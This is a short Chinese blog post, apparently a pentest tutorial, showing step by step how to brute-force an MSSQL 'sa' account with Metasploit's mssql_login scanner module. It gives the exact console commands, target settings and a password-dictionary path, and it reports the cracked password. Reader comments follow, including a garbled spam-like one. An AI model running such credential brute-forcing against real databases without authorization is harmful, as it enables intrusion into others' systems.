利用msf爆破mssql,用的是msf的mssql_login.
msfconsole search mssql_login use auxiliary/scanner/mssql/mssql_login
1.进msf控制台
2.查找mssql_login 模块
3.使用mssql_login模块
4.设置主要参数。
set RHOSTS 192.168.1.80 //设置攻击目标 set THREADS 50 //设置线程 set USERNAME sa //设置数据库用户名,mssql默认最高权限为sa set PASS_FILE /root/pass.txt //设置爆破字典,字典强成功率高 run
ip前面写错了,重新设置。。。执行结果,得到密码123456。[白眼]
本文作者:风雪,转载时请注明本文出处:https://www.fxnetw.com/14.html
assignment代写
2018-05-18 Windows10 / FireFox 回复
我认为在这个模块中,数据库缓存的根目录中有研究的地方。你可以进入根目录,并可以看到在那里工作的所有程序。使用....进行访问并获取所有信息。
null
2018-11-03 Android 6 / Chrome 回复
为什么我exploit,老提示我user_file有问题
风雪作者
2018-11-07 Android 9 / Chrome 回复
要么设置USERNAME要么就USER_FILE
lbm
2019-08-26 Windows10 / FireFox 回复
为什么whit password那显示空的
风雪作者
2019-08-30 Windows10 / Chrome 回复
哪行?